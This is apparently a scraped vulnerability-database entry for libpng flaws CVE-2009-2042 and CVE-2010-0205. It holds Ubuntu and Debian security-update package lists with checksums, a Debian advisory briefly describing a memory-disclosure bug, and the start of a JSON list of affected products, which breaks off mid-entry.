Size/MD5: 254444 4b89c89e031c0d4265b1eb3da45f06e9
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_sparc.udeb
Size/MD5: 66646 ac9aa1a738ef8ed71bd8b876f1920098
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_sparc.deb
Size/MD5: 162176 06a1b4ab47a39790da4e9b1e0967c1d2
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_sparc.deb
Size/MD5: 248222 91cca4c40c4ce6ac41df52ea62e5008a
Updated packages for Ubuntu 9.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.1.diff.gz
Size/MD5: 18107 a9bf93cac21b17a3589193ae511b75d2
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.1.dsc
Size/MD5: 1293 dc9a20f9a129ad150f61ec9bb745b039
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37.orig.tar.gz
Size/MD5: 805380 7480dbbf9f6c3297faf6fe52ec9b91ab
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.37-1ubuntu0.1_all.deb
Size/MD5: 934 3d21bd9bf41fe210303474389cfeb0a8
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_amd64.udeb
Size/MD5: 73848 d436fc20150573d565017d9e29141484
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_amd64.deb
Size/MD5: 174886 34607a76ee1ebdd82b5c71068e6e32b2
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_amd64.deb
Size/MD5: 265214 f600588bdf4f00731d94ccd8bbc68455
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_i386.udeb
Size/MD5: 70382 7d93414ce0e28351b972605abae92cd1
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_i386.deb
Size/MD5: 171402 2b8f6f1c8e8300c3149c59d1fc107659
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_i386.deb
Size/MD5: 255250 a033009f8d9a990655437c3d129668bf
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_lpia.udeb
Size/MD5: 71012 d3df3a73bf61acb9f1d489a32b3b8a60
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_lpia.deb
Size/MD5: 172126 1b94fcc470ba8878eace85240fae74cf
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_lpia.deb
Size/MD5: 257172 3c3280435a2b7d1817b49cd4a3a14bef
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_powerpc.udeb
Size/MD5: 72402 e0b80daed7db7e00d2a921ed5708ffe8
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_powerpc.deb
Size/MD5: 173494 31c424c02fe594bb6cf9acd1bef1763f
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_powerpc.deb
Size/MD5: 264450 b0546250e1804b0d385bb8eb714cd2da
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_sparc.udeb
Size/MD5: 67312 0df0d665eeb40343b9d5485910101786
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_sparc.deb
Size/MD5: 168372 2a079837d6b9f47c41a02340c5d9e27c
http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_sparc.deb
Size/MD5: 257434 05811c8ff658321e91078f280dacfbe7
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Debian Security Advisory DSA-2032-1 security@debian.org http://www.debian.org/security/ Giuseppe Iuculano April 11, 2010 http://www.debian.org/security/faq
Package : libpng Vulnerability : several Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2009-2042 CVE-2010-0205 Debian Bugs : 533676 572308
Several vulnerabilities have been discovered in libpng, a library for reading and writing PNG files. The Common Vulnerabilities and Exposures project identifies the following problems:
CVE-2009-2042
libpng does not properly parse 1-bit interlaced images with width values that are not divisible by 8, which causes libpng to include uninitialized bits in certain rows of a PNG file and might allow remote attackers to read portions of sensitive memory via "out-of-bounds pixels" in the file.
For the testing (squeeze) and unstable (sid) distribution, these problems have been fixed in version 1.2.43-1
We recommend that you upgrade your libpng package.
Upgrade instructions
wget url will fetch the file for you dpkg -i file.deb will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:
apt-get update will update the internal database apt-get upgrade will install corrected packages
You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
Debian (stable)
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny3.dsc Size/MD5 checksum: 1201 abe81b0d3c4aa7a1fa418e29f2c5b297 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny3.diff.gz Size/MD5 checksum: 19687 60ede1843ceb8a1f127c54b847a74dfa
Architecture independent packages:
http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny3_all.deb Size/MD5 checksum: 880 028b00e28aad8282714776c5dcca64a8
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_alpha.udeb Size/MD5 checksum: 86562 d9c50af59951e972557d393409b75bf2 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_alpha.deb Size/MD5 checksum: 287752 1d7d84aee223c0933d1a616722607096 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_alpha.deb Size/MD5 checksum: 182436 001ecbf421f70ca521a3968f1d14c874
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_amd64.udeb Size/MD5 checksum: 71912 78fbe1a6568671e4c557ec12e29481b0 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_amd64.deb Size/MD5 checksum: 254500 481312a64867f31c363b7fbba9cfe171 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_amd64.deb Size/MD5 checksum: 167864 3d285c20d2f080313f82eb09dcb7261b
arm architecture (ARM)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_arm.udeb Size/MD5 checksum: 64566 a4a9742190557d14beae40133fb46cf1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_arm.deb Size/MD5 checksum: 245438 a16f62e771622e05812172f7c7066504 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_arm.deb Size/MD5 checksum: 159612 81facf06de458dd6b1e84a78bb1acfc8
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_armel.udeb Size/MD5 checksum: 67028 56fc4199656d239231c7b8d8e035fead http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_armel.deb Size/MD5 checksum: 245930 9f64181bc16af0ad0de4ba2e86b25706 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_armel.deb Size/MD5 checksum: 162504 3129e1c2360fcba0309257e2b1dff8ca
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_hppa.udeb Size/MD5 checksum: 73858 9d5a53e3258b5149bee68a4d20067bf9 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_hppa.deb Size/MD5 checksum: 169602 12ddce05c84ef675c348a1e64f1a277c http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_hppa.deb Size/MD5 checksum: 261788 9297cb916e57e2f912de3f16bcbae475
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_i386.deb Size/MD5 checksum: 246968 083d472fd65f884c91dff5926e538342 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_i386.deb Size/MD5 checksum: 165560 233945ee4b1e442357276431ce495a4c http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_i386.udeb Size/MD5 checksum: 70094 769336f4574678e56931e1a1eaf6be6a
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_ia64.deb Size/MD5 checksum: 305324 42d7265034b84662467bb75456653787 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_ia64.udeb Size/MD5 checksum: 111776 ad716022a6a22371bb83f3966ebe17d4 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_ia64.deb Size/MD5 checksum: 206866 572b9d18c5adba74a4e5b99714968a60
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_mipsel.deb Size/MD5 checksum: 262242 e905771ac3fa905cc03a3ddc8f9872dd http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_mipsel.udeb Size/MD5 checksum: 68370 4d44877866357a0fd8474fd8fe183616 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_mipsel.deb Size/MD5 checksum: 164154 93c02dbae7dfe59b77ce4b683b82eaef
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_powerpc.deb Size/MD5 checksum: 166402 1d470464fe2b493aef8d95dde5fd95d8 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_powerpc.udeb Size/MD5 checksum: 70682 1dd9713672dbac4a7434f1f96a1184b5 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_powerpc.deb Size/MD5 checksum: 253478 7a87577e07ed0bb9e759b973b2d7cf18
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_s390.udeb Size/MD5 checksum: 73470 52b1a911a81f133a83a387663aa3ffb2 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_s390.deb Size/MD5 checksum: 252988 18b4c8b17b3e30ab6cce89c21c99fbfc http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_s390.deb Size/MD5 checksum: 169264 601982b9a97707ab05e1f4469cd8e20e
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_sparc.deb Size/MD5 checksum: 161562 facd643206903acfa3a503c1d69e9248 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_sparc.udeb Size/MD5 checksum: 66032 cbbe521a9a5629987603a57b8c9f35be http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_sparc.deb Size/MD5 checksum: 247212 76b8fe782fd0e5f7546bd535f8d442bc
These files will probably be moved into the stable distribution on its next update. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201003-1082",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 1.3,
"vendor": "suse",
"version": "9"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "9.04"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "8.10"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "6.0"
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "12"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "6.06"
},
{
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.6.5"
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "11"
},
{
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.1"
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "11"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "9.10"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "11.2"
},
{
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.43"
},
{
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "8.04"
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "13"
},
{
"model": "libpng",
"scope": "gte",
"trust": 1.0,
"vendor": "libpng",
"version": "1.2.0"
},
{
"model": "libpng",
"scope": "gte",
"trust": 1.0,
"vendor": "libpng",
"version": "1.4.0"
},
{
"model": "libpng",
"scope": "lt",
"trust": 1.0,
"vendor": "libpng",
"version": "1.0.53"
},
{
"model": "linux enterprise server",
"scope": "eq",
"trust": 1.0,
"vendor": "suse",
"version": "10"
},
{
"model": "libpng",
"scope": "gte",
"trust": 1.0,
"vendor": "libpng",
"version": "1.0.0"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "11.1"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "11.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.9,
"vendor": "libpng",
"version": "1.0.52"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.9,
"vendor": "libpng",
"version": "1.2.13"
},
{
"model": "lunascape",
"scope": "eq",
"trust": 0.8,
"vendor": "lunascape",
"version": "6"
},
{
"model": "libpng",
"scope": "lte",
"trust": 0.8,
"vendor": "png group",
"version": "1.4.0"
},
{
"model": "player",
"scope": "eq",
"trust": 0.8,
"vendor": "vmware",
"version": "2.5.x"
},
{
"model": "player",
"scope": "eq",
"trust": 0.8,
"vendor": "vmware",
"version": "3.1.x"
},
{
"model": "server",
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"model": "workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "vmware",
"version": "6.5.x"
},
{
"model": "workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "vmware",
"version": "7.1.x"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.8"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.6 to v10.6.4"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.8"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.6 to v10.6.4"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "10"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "11 express"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "8"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "9"
},
{
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3 (x86)"
},
{
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3 (x86-64)"
},
{
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3.0"
},
{
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "3.0 (x86-64)"
},
{
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "4.0"
},
{
"model": "asianux server",
"scope": "eq",
"trust": 0.8,
"vendor": "cybertrust",
"version": "4.0 (x86-64)"
},
{
"model": "pictbear",
"scope": "lt",
"trust": 0.8,
"vendor": "fenrir",
"version": "2.01"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3 (ws)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4 (ws)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4.8 (as)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4.8 (es)"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5 (server)"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "3.0"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "4.0"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5.0 (client)"
},
{
"model": "rhel desktop workstation",
"scope": "eq",
"trust": 0.8,
"vendor": "red hat",
"version": "5 (client)"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.46"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.47"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.2.11"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.48"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.2.23"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.51"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.6,
"vendor": "libpng",
"version": "1.0.50"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1.2"
},
{
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.8126538"
},
{
"model": "linux armel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.10"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.24"
},
{
"model": "linux hppa",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "multi network firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "2.0"
},
{
"model": "player build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.4246459"
},
{
"model": "linux enterprise sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.25"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.42"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.6"
},
{
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.17"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.3"
},
{
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.43"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.7"
},
{
"model": "intuity audix",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"model": "corporate server x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "4.0"
},
{
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1.1"
},
{
"model": "intuity audix lx r1.1",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5"
},
{
"model": "enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "5"
},
{
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.16"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0.2"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.18"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.8"
},
{
"model": "workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.7"
},
{
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.580187"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"model": "voice portal sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"model": "messaging storage server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"model": "server build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.0.2203138"
},
{
"model": "intuity audix lx sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"model": "beta01",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.27"
},
{
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.0.2"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.7"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.10"
},
{
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "1.0.3"
},
{
"model": "player",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "2.5.1"
},
{
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.13"
},
{
"model": "intuity audix lx",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.1"
},
{
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"model": "hat enterprise linux desktop client",
"scope": "eq",
"trust": 0.3,
"vendor": "red",
"version": "5"
},
{
"model": "workstation build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5.4246459"
},
{
"model": "player",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "3.1"
},
{
"model": "workstation build",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "6.5118166"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.10"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"model": "intuity audix lx sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"model": "enterprise linux ws",
"scope": "eq",
"trust": 0.3,
